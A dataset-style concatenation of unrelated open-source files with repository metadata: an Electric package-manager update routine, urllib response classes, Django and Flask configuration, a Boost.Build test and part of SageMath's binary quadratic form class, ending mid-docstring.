de2bcda568284fd054815ecfaaa8d95a026c61f9
|
[
"Apache-2.0"
] | null | null | null |
src/zip_update.py
|
vidhyanijadala/electric
|
de2bcda568284fd054815ecfaaa8d95a026c61f9
|
[
"Apache-2.0"
] | 1
|
2021-07-02T13:30:39.000Z
|
2021-07-02T13:30:39.000Z
|
import json
from json.decoder import JSONDecodeError
import requests
from Classes.Metadata import Metadata
from Classes.PortablePacket import PortablePacket
from extension import write
from colorama import Fore
from zip_utils import *
import os
import sys
home = os.path.expanduser('~')
def update_portable(ctx, packet: PortablePacket, metadata: Metadata):
import shutil
import click
from difflib import get_close_matches
write(f'Updating [ {Fore.LIGHTCYAN_EX}{packet.display_name}{Fore.RESET} ]', 'white', metadata)
options = os.listdir(rf'{home}\electric')
matches = get_close_matches(rf'{home}\electric\{packet.json_name}@{packet.latest_version}', options)
if len(matches) == 1:
# similar package exists and we need to get the version of the currently installed package.
current_version = matches[0].split('@')[-1].replace('.json', '')
if current_version != packet.latest_version:
write(f'{packet.display_name} Will Be Updated From ({current_version}) => ({packet.latest_version})', 'green', metadata)
write('Requesting Currently Installed Version', 'yellow', metadata)
REQA = 'https://raw.githubusercontent.com/electric-package-manager/electric-packages/master/packages/'
try:
response = requests.get(REQA + packet.json_name + '.json', timeout=5)
except (requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout):
click.echo(click.style(
f'Failed to request {packet.json_name}.json from raw.githubusercontent.com', 'red'))
sys.exit()
try:
res = json.loads(response.text)
except JSONDecodeError:
click.echo(click.style(f'{packet.json_name} not found!', 'red'))
sys.exit()
pkg = res
pkg = pkg['portable']
keys = list(pkg[current_version].keys())
data = {
'display-name': res['display-name'],
'package-name': res['package-name'],
'latest-version': res['latest-version'],
'url': pkg[current_version]['url'],
'file-type': pkg[current_version]['file-type'] if 'file-type' in keys else None,
'extract-dir': res['package-name'],
'chdir': pkg[current_version]['chdir'] if 'chdir' in keys else [],
'bin': pkg[current_version]['bin'] if 'bin' in keys else [],
'shortcuts': pkg[current_version]['shortcuts'] if 'shortcuts' in keys else [],
'pre-install': pkg[current_version]['pre-install'] if 'pre-install' in keys else [],
'post-install': pkg[current_version]['post-install'] if 'post-install' in keys else [],
'install-notes': pkg[current_version]['install-notes'] if 'install-notes' in keys else None,
'uninstall-notes': pkg[current_version]['uninstall-notes'] if 'uninstall-notes' in keys else None,
'set-env': pkg[current_version]['set-env'] if 'set-env' in keys else None,
'persist': pkg[current_version]['persist'] if 'persist' in keys else None,
'checksum': pkg[current_version]['checksum'] if 'checksum' in keys else None,
'dependencies': pkg[current_version]['dependencies'] if 'dependencies' in keys else None,
}
old_packet = PortablePacket(data)
# continue updating the package
# if a directory has to be saved before uninstallation and installation of the portable
if old_packet.persist:
install_directory = rf'{home}\electric\{old_packet.json_name}@{current_version}\\'
if old_packet.chdir:
install_directory += old_packet.chdir + '\\'
install_directory = install_directory.replace('\\\\', '\\')
if isinstance(old_packet.persist, list):
for path in old_packet.persist:
# multiple directories to backup
try:
shutil.copytree(install_directory + path, rf'{home}\electric\Persist\{old_packet.json_name}@{current_version}\{path}')
except FileExistsError:
pass
else:
# only 1 directory to backup
if old_packet.persist:
try:
shutil.copytree(install_directory + old_packet.persist, rf'{home}\electric\Persist\{old_packet.json_name}@{current_version}\{old_packet.persist}')
except FileExistsError:
pass
os.system(f'electric uninstall {packet.json_name} --portable')
os.system(f'electric install {packet.json_name} --portable')
new_install_dir = rf'{home}\electric\{packet.json_name}@{packet.latest_version}\\'
if packet.chdir:
new_install_dir += packet.chdir + '\\'
new_install_dir = new_install_dir.replace('\\\\', '\\')
if old_packet.persist:
write('Restoring Old Files And Data', 'green', metadata)
if isinstance(old_packet.persist, list):
for path in old_packet.persist:
shutil.rmtree(new_install_dir + path)
shutil.copytree(rf'{home}\electric\Persist\{old_packet.json_name}@{current_version}\{path}', new_install_dir + path)
else:
shutil.rmtree(new_install_dir.replace('\\\\', '\\') + old_packet.persist.replace('\\\\', '\\'))
shutil.copytree(rf'{home}\electric\Persist\{old_packet.json_name}@{current_version}\{old_packet.persist}', new_install_dir + old_packet.persist)
# completed backup of files to backups directory
write(rf'Successfully Completed Backup Of Required Data To {home}\electric\Persist', 'cyan', metadata)
    else:
        write(f'Could not find any existing installations of {packet.display_name}', 'red', metadata)
        sys.exit()
    write(f'Successfully Updated {packet.display_name}', 'bright_magenta', metadata)
    sys.exit()
| 46.584615
| 170
| 0.619551
|
4a143b03e676b27fbba0d9cb0105d34df3ae2dd3
| 2,188
|
py
|
Python
|
bin/Lib/urllib/response.py
|
yousafsyed/casperjs
|
ed077ae9e42cf8fb9e023e9b6840d3cea11bac40
|
[
"MIT"
] | 36
|
2015-02-04T10:43:31.000Z
|
2022-03-30T13:01:12.000Z
|
bin/Lib/urllib/response.py
|
yousafsyed/casperjs
|
ed077ae9e42cf8fb9e023e9b6840d3cea11bac40
|
[
"MIT"
] | 9
|
2015-03-17T05:56:16.000Z
|
2021-11-17T09:31:50.000Z
|
bin/Lib/urllib/response.py
|
yousafsyed/casperjs
|
ed077ae9e42cf8fb9e023e9b6840d3cea11bac40
|
[
"MIT"
] | 22
|
2015-05-13T17:37:35.000Z
|
2022-01-25T06:24:42.000Z
|
"""Response classes used by urllib.
The base class, addbase, defines a minimal file-like interface,
including read() and readline(). The typical response object is an
addinfourl instance, which defines an info() method that returns
headers and a geturl() method that returns the url.
"""
import tempfile
__all__ = ['addbase', 'addclosehook', 'addinfo', 'addinfourl']
class addbase(tempfile._TemporaryFileWrapper):
"""Base class for addinfo and addclosehook. Is a good idea for garbage collection."""
# XXX Add a method to expose the timeout on the underlying socket?
def __init__(self, fp):
super(addbase, self).__init__(fp, '<urllib response>', delete=False)
# Keep reference around as this was part of the original API.
self.fp = fp
def __repr__(self):
return '<%s at %r whose fp = %r>' % (self.__class__.__name__,
id(self), self.file)
def __enter__(self):
if self.fp.closed:
raise ValueError("I/O operation on closed file")
return self
def __exit__(self, type, value, traceback):
self.close()
class addclosehook(addbase):
"""Class to add a close hook to an open file."""
def __init__(self, fp, closehook, *hookargs):
super(addclosehook, self).__init__(fp)
self.closehook = closehook
self.hookargs = hookargs
def close(self):
if self.closehook:
self.closehook(*self.hookargs)
self.closehook = None
self.hookargs = None
super(addclosehook, self).close()
class addinfo(addbase):
"""class to add an info() method to an open file."""
def __init__(self, fp, headers):
super(addinfo, self).__init__(fp)
self.headers = headers
def info(self):
return self.headers
class addinfourl(addinfo):
"""class to add info() and geturl() methods to an open file."""
def __init__(self, fp, headers, url, code=None):
super(addinfourl, self).__init__(fp, headers)
self.url = url
self.code = code
def getcode(self):
return self.code
def geturl(self):
return self.url
| 28.415584
| 89
| 0.632541
|
4a143b684f319f7ad8e64fc1116d1e09fce8109a
| 81
|
py
|
Python
|
FusionIIIT/applications/ps1/apps.py
|
sabhishekpratap5/sonarcubeTest2
|
9bd8105e457f6feb8c38fa94b335e54783fca99e
|
[
"bzip2-1.0.6"
] | 29
|
2019-02-20T15:35:33.000Z
|
2022-03-22T11:10:57.000Z
|
FusionIIIT/applications/ps1/apps.py
|
sabhishekpratap5/sonarcubeTest2
|
9bd8105e457f6feb8c38fa94b335e54783fca99e
|
[
"bzip2-1.0.6"
] | 409
|
2019-01-17T19:30:51.000Z
|
2022-03-31T16:28:45.000Z
|
FusionIIIT/applications/ps1/apps.py
|
sabhishekpratap5/sonarcubeTest2
|
9bd8105e457f6feb8c38fa94b335e54783fca99e
|
[
"bzip2-1.0.6"
] | 456
|
2019-01-12T11:01:13.000Z
|
2022-03-30T17:06:52.000Z
|
from django.apps import AppConfig
class Ps1Config(AppConfig):
name = 'ps1'
| 13.5
| 33
| 0.728395
|
4a143c9921e7b90bbdbcb8e9dc5d4caba638f04b
| 1,144
|
py
|
Python
|
tools/build/v2/test/core_actions_quietly.py
|
jmuskaan72/Boost
|
047e36c01841a8cd6a5c74d4e3034da46e327bc1
|
[
"BSL-1.0"
] | 198
|
2015-01-13T05:47:18.000Z
|
2022-03-09T04:46:46.000Z
|
tools/build/v2/test/core_actions_quietly.py
|
xiaoliang2121/Boost
|
fc90c3fde129c62565c023f091eddc4a7ed9902b
|
[
"BSL-1.0"
] | 4
|
2015-03-19T08:23:23.000Z
|
2019-06-24T07:48:47.000Z
|
tools/build/v2/test/core_actions_quietly.py
|
xiaoliang2121/Boost
|
fc90c3fde129c62565c023f091eddc4a7ed9902b
|
[
"BSL-1.0"
] | 139
|
2015-01-15T20:09:31.000Z
|
2022-01-31T15:21:16.000Z
|
#!/usr/bin/python
# Copyright 2007 Rene Rivera.
# Copyright 2011 Steven Watanabe
# Distributed under the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
import BoostBuild
t = BoostBuild.Tester(pass_toolset=0)
t.write("file.jam", """
actions quietly .a.
{
echo [$(<:B)] 0
echo [$(<:B)] 1
echo [$(<:B)] 2
}
rule .a.
{
DEPENDS $(<) : $(>) ;
}
NOTFILE subtest ;
.a. subtest_a : subtest ;
.a. subtest_b : subtest ;
DEPENDS all : subtest_a subtest_b ;
""")
t.run_build_system("-ffile.jam -d2", stdout="""...found 4 targets...
...updating 2 targets...
.a. subtest_a
echo [subtest_a] 0
echo [subtest_a] 1
echo [subtest_a] 2
[subtest_a] 0
[subtest_a] 1
[subtest_a] 2
.a. subtest_b
echo [subtest_b] 0
echo [subtest_b] 1
echo [subtest_b] 2
[subtest_b] 0
[subtest_b] 1
[subtest_b] 2
...updated 2 targets...
""")
t.run_build_system("-ffile.jam -d1", stdout="""...found 4 targets...
...updating 2 targets...
...updated 2 targets...
""")
t.cleanup()
| 19.066667
| 83
| 0.594406
|
4a143cdff8f8226b2f208d0ef1469dfef9738c76
| 919
|
py
|
Python
|
run.py
|
BrechtDewilde1/RoadToRotterdam
|
4531ee5d082215b29197781435c2f5a61a5607dc
|
[
"MIT"
] | null | null | null |
run.py
|
BrechtDewilde1/RoadToRotterdam
|
4531ee5d082215b29197781435c2f5a61a5607dc
|
[
"MIT"
] | null | null | null |
run.py
|
BrechtDewilde1/RoadToRotterdam
|
4531ee5d082215b29197781435c2f5a61a5607dc
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
from flask_migrate import Migrate
from sys import exit
from decouple import config
from apps.config import config_dict
from apps import create_app, db
# WARNING: Don't run with debug turned on in production!
DEBUG = config('DEBUG', default=True, cast=bool)
# The configuration
get_config_mode = 'Debug' if DEBUG else 'Production'
try:
# Load the configuration using the default values
app_config = config_dict[get_config_mode.capitalize()]
except KeyError:
exit('Error: Invalid <config_mode>. Expected values [Debug, Production] ')
app = create_app(app_config)
Migrate(app, db)
if DEBUG:
app.logger.info('DEBUG = ' + str(DEBUG))
app.logger.info('Environment = ' + get_config_mode)
app.logger.info('DBMS = ' + app_config.SQLALCHEMY_DATABASE_URI)
if __name__ == "__main__":
    app.run(debug=True)
| 24.837838
| 78
| 0.712731
|
4a143e4148739ed033a54d5c155b8c9b27c2b094
| 52,993
|
py
|
Python
|
src/sage/quadratic_forms/binary_qf.py
|
dimpase/sagetrac-mirror
|
473cd41f19ec23df7e207391cfb0cf41c7c4ef46
|
[
"BSL-1.0"
] | 10
|
2018-06-01T21:54:53.000Z
|
2022-03-14T20:11:34.000Z
|
src/sage/quadratic_forms/binary_qf.py
|
dimpase/sagetrac-mirror
|
473cd41f19ec23df7e207391cfb0cf41c7c4ef46
|
[
"BSL-1.0"
] | 2
|
2021-04-02T20:43:29.000Z
|
2021-04-05T23:38:58.000Z
|
src/sage/quadratic_forms/binary_qf.py
|
dimpase/sagetrac-mirror
|
473cd41f19ec23df7e207391cfb0cf41c7c4ef46
|
[
"BSL-1.0"
] | 15
|
2020-07-23T10:46:25.000Z
|
2022-01-25T15:37:24.000Z
|
"""
Binary Quadratic Forms with Integer Coefficients
This module provides a specialized class for working with a binary quadratic
form `a x^2 + b x y + c y^2`, stored as a triple of integers `(a, b, c)`.
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3])
sage: Q
x^2 + 2*x*y + 3*y^2
sage: Q.discriminant()
-8
sage: Q.reduced_form()
x^2 + 2*y^2
sage: Q(1, 1)
6
TESTS::
sage: Q == loads(dumps(Q))
True
AUTHORS:
- Jon Hanke (2006-08-08):
- Appended to add the methods :func:`BinaryQF_reduced_representatives`,
:meth:`~BinaryQF.is_reduced`, and ``__add__`` on 8-3-2006 for Coding Sprint
#2.
- Added Documentation and :meth:`~BinaryQF.complex_point` method on 8-8-2006.
- Nick Alexander: add doctests and clean code for Doc Days 2
- William Stein (2009-08-05): composition; some ReSTification.
- William Stein (2009-09-18): make immutable.
- Justin C. Walker (2011-02-06):
- Add support for indefinite forms.
"""
# ****************************************************************************
# Copyright (C) 2006-2009 William Stein and Jon Hanke
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from functools import total_ordering
from sage.libs.pari.all import pari_gen
from sage.rings.all import ZZ, is_fundamental_discriminant
from sage.arith.all import gcd
from sage.structure.sage_object import SageObject
from sage.matrix.matrix_space import MatrixSpace
from sage.matrix.constructor import Matrix
from sage.misc.cachefunc import cached_method
@total_ordering
class BinaryQF(SageObject):
r"""
A binary quadratic form over `\ZZ`.
INPUT:
One of the following:
- ``a`` -- either a 3-tuple of integers, or a quadratic
homogeneous polynomial in two variables with integer
coefficients
- ``a``, ``b``, ``c`` -- three integers
OUTPUT:
    the binary quadratic form `a x^2 + b x y + c y^2`.
EXAMPLES::
sage: b = BinaryQF([1, 2, 3])
sage: b.discriminant()
-8
sage: b1 = BinaryQF(1, 2, 3)
sage: b1 == b
True
sage: R.<x, y> = ZZ[]
sage: BinaryQF(x^2 + 2*x*y + 3*y^2) == b
True
sage: BinaryQF(1, 0, 1)
x^2 + y^2
"""
def __init__(self, a, b=None, c=None):
r"""
Create a binary quadratic form `ax^2 + bxy + cy^2`.
INPUT:
One of the following:
- ``a`` -- either a 3-tuple of integers, or a quadratic
homogeneous polynomial in two variables with integer
coefficients
- ``a``, ``b``, ``c`` -- three integers
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3]); Q
x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([1, 2])
Traceback (most recent call last):
...
TypeError: binary quadratic form must be given by a quadratic homogeneous bivariate integer polynomial or its coefficients
sage: R.<x, y> = ZZ[]
sage: f = x^2 + 2*x*y + 3*y^2
sage: BinaryQF(f)
x^2 + 2*x*y + 3*y^2
sage: BinaryQF(f + x)
Traceback (most recent call last):
...
TypeError: binary quadratic form must be given by a quadratic homogeneous bivariate integer polynomial or its coefficients
TESTS::
sage: BinaryQF(0)
0
"""
from sage.rings.polynomial.multi_polynomial_element import is_MPolynomial
if b is None and c is None:
if (isinstance(a, (list, tuple))
and len(a) == 3):
a, b, c = a
elif a == 0:
a = b = c = 0
elif (is_MPolynomial(a) and a.is_homogeneous() and a.base_ring() == ZZ
and a.degree() == 2 and a.parent().ngens() == 2):
x, y = a.parent().gens()
a, b, c = [a.monomial_coefficient(mon) for mon in [x**2, x*y, y**2]]
elif isinstance(a, pari_gen) and a.type() in ('t_QFI', 't_QFR'):
# a has 3 or 4 components
a, b, c = a[0], a[1], a[2]
try:
self._a = ZZ(a)
self._b = ZZ(b)
self._c = ZZ(c)
except TypeError:
raise TypeError('binary quadratic form must be given by a quadratic homogeneous bivariate integer polynomial or its coefficients')
self._poly = None
def _pari_init_(self):
"""
Convert this quadratic form to PARI.
EXAMPLES::
sage: f = BinaryQF([2, 3, 4]); f
2*x^2 + 3*x*y + 4*y^2
sage: f._pari_init_()
'Qfb(2,3,4)'
sage: pari(f)
Qfb(2, 3, 4)
sage: type(pari(f))
<... 'cypari2.gen.Gen'>
sage: gp(f)
Qfb(2, 3, 4)
sage: type(gp(f))
<class 'sage.interfaces.gp.GpElement'>
"""
return 'Qfb(%s,%s,%s)' % (self._a, self._b, self._c)
def __mul__(self, right):
"""
Gauss composition or right action by a 2x2 integer matrix.
The result need not be reduced.
EXAMPLES:
We explicitly compute in the group of classes of positive
definite binary quadratic forms of discriminant -23::
sage: R = BinaryQF_reduced_representatives(-23, primitive_only=False); R
[x^2 + x*y + 6*y^2, 2*x^2 - x*y + 3*y^2, 2*x^2 + x*y + 3*y^2]
sage: R[0] * R[0]
x^2 + x*y + 6*y^2
sage: R[1] * R[1]
4*x^2 + 3*x*y + 2*y^2
sage: (R[1] * R[1]).reduced_form()
2*x^2 + x*y + 3*y^2
sage: (R[1] * R[1] * R[1]).reduced_form()
x^2 + x*y + 6*y^2
sage: q1 = BinaryQF(1, 1, 4)
sage: M = Matrix(ZZ, [[1, 3], [0, 1]])
sage: q1*M
x^2 + 7*x*y + 16*y^2
sage: q1.matrix_action_right(M)
x^2 + 7*x*y + 16*y^2
sage: N = Matrix(ZZ, [[1, 0], [1, 0]])
sage: q1*(M*N) == q1.matrix_action_right(M).matrix_action_right(N)
True
"""
# Either a "right" action by
# ...or Gaussian composition
if isinstance(right, BinaryQF):
return BinaryQF(self.__pari__().qfbcompraw(right))
# ...or a 2x2 matrix...
if (isinstance(right.parent(), MatrixSpace)
and right.nrows() == right.ncols() == 2):
aa = right[0, 0]
bb = right[0, 1]
cc = right[1, 0]
dd = right[1, 1]
A = self.polynomial()(aa, cc)
C = self.polynomial()(bb, dd)
B = self.polynomial()(aa + bb, cc + dd) - A - C
qf = BinaryQF(A, B, C)
return qf
raise TypeError("right operand must be a binary quadratic form or 2x2 matrix")
def __getitem__(self, n):
"""
Return the `n`-th component of this quadratic form.
        If this form is `a x^2 + b x y + c y^2`, the 0-th component is `a`,
        the 1-st component is `b`, and the 2-nd component is `c`.
Indexing is like lists -- negative indices and slices are allowed.
EXAMPLES::
sage: Q = BinaryQF([2, 3, 4])
sage: Q[0]
2
sage: Q[2]
4
sage: Q[:2]
(2, 3)
sage: tuple(Q)
(2, 3, 4)
sage: list(Q)
[2, 3, 4]
"""
return (self._a, self._b, self._c)[n]
def __call__(self, *args):
r"""
Evaluate this quadratic form at a point.
INPUT:
        - ``args`` -- `x` and `y` values, either as two separate arguments
          or as a single list, tuple, or vector
EXAMPLES::
sage: Q = BinaryQF([2, 3, 4])
sage: Q(1, 2)
24
TESTS::
sage: Q = BinaryQF([2, 3, 4])
sage: Q([1, 2])
24
sage: Q((1, 2))
24
sage: Q(vector([1, 2]))
24
"""
if len(args) == 1:
args = args[0]
x, y = args
return (self._a * x + self._b * y) * x + self._c * y**2
def __hash__(self):
r"""
TESTS::
sage: hash(BinaryQF([2, 2, 3]))
802
sage: hash(BinaryQF([2, 3, 2]))
562
sage: hash(BinaryQF([3, 2, 2]))
547
"""
return hash(self._a) ^ (hash(self._b) << 4) ^ (hash(self._c) << 8)
def __eq__(self, right):
"""
Return ``True`` if ``self`` and ``right`` are identical.
This means that they have the same coefficients.
EXAMPLES::
sage: P = BinaryQF([2, 2, 3])
sage: Q = BinaryQF([2, 2, 3])
sage: R = BinaryQF([1, 2, 3])
sage: P == Q # indirect doctest
True
sage: P == R # indirect doctest
False
TESTS::
sage: P == P
True
sage: Q == P
True
sage: R == P
False
sage: P == 2
False
"""
if not isinstance(right, BinaryQF):
return False
return (self._a, self._b, self._c) == (right._a, right._b, right._c)
def __ne__(self, right):
"""
Return ``True`` if ``self`` and ``right`` are not identical.
This means that they have different coefficients.
EXAMPLES::
sage: P = BinaryQF([2, 2, 3])
sage: Q = BinaryQF([2, 2, 3])
sage: R = BinaryQF([1, 2, 3])
sage: P != Q # indirect doctest
False
sage: P != R # indirect doctest
True
"""
return not (self == right)
def __lt__(self, right):
"""
Compare the coefficients of ``self`` and ``right``.
This is done lexicographically.
EXAMPLES::
sage: P = BinaryQF([2, 2, 3])
sage: Q = BinaryQF([1, 2, 3])
sage: P < Q
False
sage: Q < P
True
sage: Q <= P
True
"""
if not isinstance(right, BinaryQF):
return False
return (self._a, self._b, self._c) < (right._a, right._b, right._c)
def __add__(self, Q):
"""
Return the component-wise sum of two forms.
Given `a_1 x^2 + b_1 x y + c_1 y^2` and `a_2 x^2 + b_2 x y +
c_2 y^2`, this returns the form `(a_1 + a_2) x^2 + (b_1 + b_2)
x y + (c_1 + c_2) y^2.`
EXAMPLES::
sage: P = BinaryQF([2, 2, 3]); P
2*x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([-1, 2, 2]); Q
-x^2 + 2*x*y + 2*y^2
sage: P + Q
x^2 + 4*x*y + 5*y^2
sage: P + Q == BinaryQF([1, 4, 5]) # indirect doctest
True
TESTS::
sage: Q + P == BinaryQF([1, 4, 5]) # indirect doctest
True
"""
return BinaryQF([self._a + Q._a, self._b + Q._b, self._c + Q._c])
def __sub__(self, Q):
"""
Return the component-wise difference of two forms.
Given two forms `a_1 x^2 + b_1 x y + c_1 y^2` and `a_2 x^2 +
b_2 x y + c_2 y^2`, this returns the form `(a_1 - a_2) x^2 +
(b_1 - b_2) x y + (c_1 - c_2) y^2.`
EXAMPLES::
sage: P = BinaryQF([2, 2, 3]); P
2*x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([-1, 2, 2]); Q
-x^2 + 2*x*y + 2*y^2
sage: P - Q
3*x^2 + y^2
sage: P - Q == BinaryQF([3, 0, 1]) # indirect doctest
True
TESTS::
sage: Q - P == BinaryQF([3, 0, 1]) # indirect doctest
False
sage: Q - P != BinaryQF([3, 0, 1]) # indirect doctest
True
"""
return BinaryQF([self._a - Q._a, self._b - Q._b, self._c - Q._c])
def _repr_(self):
"""
Display the quadratic form.
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3]); Q # indirect doctest
x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([-1, 2, 3]); Q
-x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([0, 0, 0]); Q
0
"""
return repr(self.polynomial())
def _latex_(self):
"""
Return latex representation of this binary quadratic form.
EXAMPLES::
sage: f = BinaryQF((778, 1115, 400)); f
778*x^2 + 1115*x*y + 400*y^2
sage: latex(f) # indirect doctest
778 x^{2} + 1115 x y + 400 y^{2}
"""
return self.polynomial()._latex_()
def content(self):
"""
Return the content of the form, i.e., the gcd of the coefficients.
EXAMPLES::
sage: Q = BinaryQF(22, 14, 10)
sage: Q.content()
2
sage: Q = BinaryQF(4, 4, -15)
sage: Q.content()
1
"""
return gcd([self._a, self._b, self._c])
def polynomial(self):
"""
Return ``self`` as a homogeneous 2-variable polynomial.
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3])
sage: Q.polynomial()
x^2 + 2*x*y + 3*y^2
sage: Q = BinaryQF([-1, -2, 3])
sage: Q.polynomial()
-x^2 - 2*x*y + 3*y^2
sage: Q = BinaryQF([0, 0, 0])
sage: Q.polynomial()
0
"""
# Note: Caching in _poly seems to give a very slight
# improvement (~0.2 usec) in 'timeit()' runs. Not sure it
# is worth the instance variable.
if self._poly is None:
self._poly = self(ZZ['x, y'].gens())
return self._poly
@cached_method
def discriminant(self):
"""
Return the discriminant of ``self``.
Given a form `ax^2 + bxy + cy^2`, this returns `b^2 - 4ac`.
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3])
sage: Q.discriminant()
-8
"""
return self._b**2 - 4 * self._a * self._c
def determinant(self):
"""
Return the determinant of the matrix associated to ``self``.
The determinant is used by Gauss and by Conway-Sloane, for
whom an integral quadratic form has coefficients `(a, 2b, c)`
with `a`, `b`, `c` integers.
OUTPUT:
The determinant of the matrix::
[ a b/2]
[b/2 c]
        as a rational number
REMARK:
This is just `-D/4` where `D` is the discriminant. The return
type is rational even if `b` (and hence `D`) is even.
EXAMPLES::
sage: q = BinaryQF(1, -1, 67)
sage: q.determinant()
267/4
"""
return self._a*self._c - (self._b**2)/4
# for consistency with general quadratic form code
det = determinant
@cached_method
def has_fundamental_discriminant(self):
"""
        Return whether the discriminant `D` of this form is a fundamental
        discriminant (i.e., `D` is the smallest element of its
        square class with `D = 0` or `1` modulo `4`).
EXAMPLES::
sage: Q = BinaryQF([1, 0, 1])
sage: Q.discriminant()
-4
sage: Q.has_fundamental_discriminant()
True
sage: Q = BinaryQF([2, 0, 2])
sage: Q.discriminant()
-16
sage: Q.has_fundamental_discriminant()
False
"""
return is_fundamental_discriminant(self.discriminant())
@cached_method
def is_primitive(self):
r"""
        Check whether the form `ax^2 + bxy + cy^2` satisfies
        `\gcd(a, b, c) = 1`, i.e., is primitive.
EXAMPLES::
sage: Q = BinaryQF([6, 3, 9])
sage: Q.is_primitive()
False
sage: Q = BinaryQF([1, 1, 1])
sage: Q.is_primitive()
True
sage: Q = BinaryQF([2, 2, 2])
sage: Q.is_primitive()
False
sage: rqf = BinaryQF_reduced_representatives(-23*9, primitive_only=False)
sage: [qf.is_primitive() for qf in rqf]
[True, True, True, False, True, True, False, False, True]
sage: rqf
[x^2 + x*y + 52*y^2,
2*x^2 - x*y + 26*y^2,
2*x^2 + x*y + 26*y^2,
3*x^2 + 3*x*y + 18*y^2,
4*x^2 - x*y + 13*y^2,
4*x^2 + x*y + 13*y^2,
6*x^2 - 3*x*y + 9*y^2,
6*x^2 + 3*x*y + 9*y^2,
8*x^2 + 7*x*y + 8*y^2]
sage: [qf for qf in rqf if qf.is_primitive()]
[x^2 + x*y + 52*y^2,
2*x^2 - x*y + 26*y^2,
2*x^2 + x*y + 26*y^2,
4*x^2 - x*y + 13*y^2,
4*x^2 + x*y + 13*y^2,
8*x^2 + 7*x*y + 8*y^2]
"""
return gcd([self._a, self._b, self._c]) == 1
@cached_method
def is_zero(self):
"""
        Return whether ``self`` is identically zero.
EXAMPLES::
sage: Q = BinaryQF(195751, 37615, 1807)
sage: Q.is_zero()
False
sage: Q = BinaryQF(0, 0, 0)
sage: Q.is_zero()
True
"""
return self.content() == 0
@cached_method
def is_weakly_reduced(self):
r"""
        Check whether the form `ax^2 + bxy + cy^2` satisfies
        `|b| \leq a \leq c`, i.e., is weakly reduced.
EXAMPLES::
sage: Q = BinaryQF([1, 2, 3])
sage: Q.is_weakly_reduced()
False
sage: Q = BinaryQF([2, 1, 3])
sage: Q.is_weakly_reduced()
True
sage: Q = BinaryQF([1, -1, 1])
sage: Q.is_weakly_reduced()
True
"""
if self.discriminant() >= 0:
raise ValueError("only defined for negative discriminant")
return (abs(self._b) <= self._a) and (self._a <= self._c)
@cached_method
def is_reducible(self):
r"""
        Return whether this form is reducible and cache the result.
A binary form `q` is called reducible if it is the product of
two linear forms `q = (a x + b y) (c x + d y)`, or
equivalently if its discriminant is a square.
EXAMPLES::
sage: q = BinaryQF([1, 0, -1])
sage: q.is_reducible()
True
"""
return self.discriminant().is_square()
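    # For instance, x^2 - y^2 = (x + y)*(x - y) has discriminant
    # 0^2 - 4*1*(-1) = 4, a perfect square, consistent with the doctest above.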
def _reduce_indef(self, transformation=False):
"""
Reduce an indefinite, non-reduced form.
INPUT:
- ``transformation`` -- bool (default: ``False``); if ``True``,
return both the reduced form and a matrix transforming
``self`` into the reduced form.
TESTS::
sage: f = BinaryQF(-1, 0, 3)
sage: f._reduce_indef(transformation=False)
-x^2 + 2*x*y + 2*y^2
sage: red, trans = f._reduce_indef(transformation=True)
sage: red
-x^2 + 2*x*y + 2*y^2
sage: trans
[-1 1]
[ 0 -1]
sage: red == f*trans
True
sage: f = BinaryQF(0, 5, 24)
sage: red, trans = f._reduce_indef(transformation=True)
sage: red == f*trans
True
"""
if transformation:
U = Matrix(ZZ, 2, 2, [1, 0, 0, 1])
d = self.discriminant().sqrt(prec=53)
Q = self
while not Q.is_reduced():
a = Q._a
b = Q._b
c = Q._c
cabs = c.abs()
# rho(f) as defined in [BUVO2007]_ p. 112 equation (6.12)
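            # In coefficients, one rho step sends (a, b, c) to
            # (c, -b + 2*s*c, c*s^2 - b*s + a), which is the update applied below.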
if cabs != 0:
if cabs >= d:
s = c.sign() * ((cabs + b) / (2 * cabs)).floor()
else:
s = c.sign() * ((d + b) / (2 * cabs)).floor()
if transformation:
T = Matrix(ZZ, 2, 2, [0, -1, 1, s])
U = U * T
Q = BinaryQF(c, -b + 2*s*c, c*s*s - b*s + a)
else:
if b < 0:
Q = BinaryQF(a, -b, c)
if transformation:
T = Matrix(ZZ, 2, 2, [1, 0, 0, -1])
U = U * T
else:
q, r = a.quo_rem(b)
if 2*r > b:
q, r = a.quo_rem(-b)
q = -q
if transformation:
T = Matrix(ZZ, 2, 2, [1, 0, -q, 1])
U = U * T
Q = BinaryQF(r, b, c)
if transformation:
return Q, U
return Q
@cached_method
def reduced_form(self, transformation=False, algorithm="default"):
"""
Return a reduced form equivalent to ``self``.
INPUT:
        - ``self`` -- binary quadratic form
        - ``transformation`` -- boolean (default: ``False``); if ``True``, return
          both the reduced form and a matrix transforming ``self`` into the
          reduced form. Currently only implemented for indefinite forms.
        - ``algorithm`` -- string; the algorithm to use. Valid options are:
* ``'default'`` -- Let Sage pick an algorithm (default).
* ``'pari'`` -- use PARI
* ``'sage'`` -- use Sage
.. SEEALSO::
:meth:`is_reduced`
EXAMPLES::
sage: a = BinaryQF([33, 11, 5])
sage: a.is_reduced()
False
sage: b = a.reduced_form(); b
5*x^2 - x*y + 27*y^2
sage: b.is_reduced()
True
sage: a = BinaryQF([15, 0, 15])
sage: a.is_reduced()
True
sage: b = a.reduced_form(); b
15*x^2 + 15*y^2
sage: b.is_reduced()
True
Examples of reducing indefinite forms::
sage: f = BinaryQF(1, 0, -3)
sage: f.is_reduced()
False
sage: g = f.reduced_form(); g
x^2 + 2*x*y - 2*y^2
sage: g.is_reduced()
True
sage: q = BinaryQF(1, 0, -1)
sage: q.reduced_form()
x^2 + 2*x*y
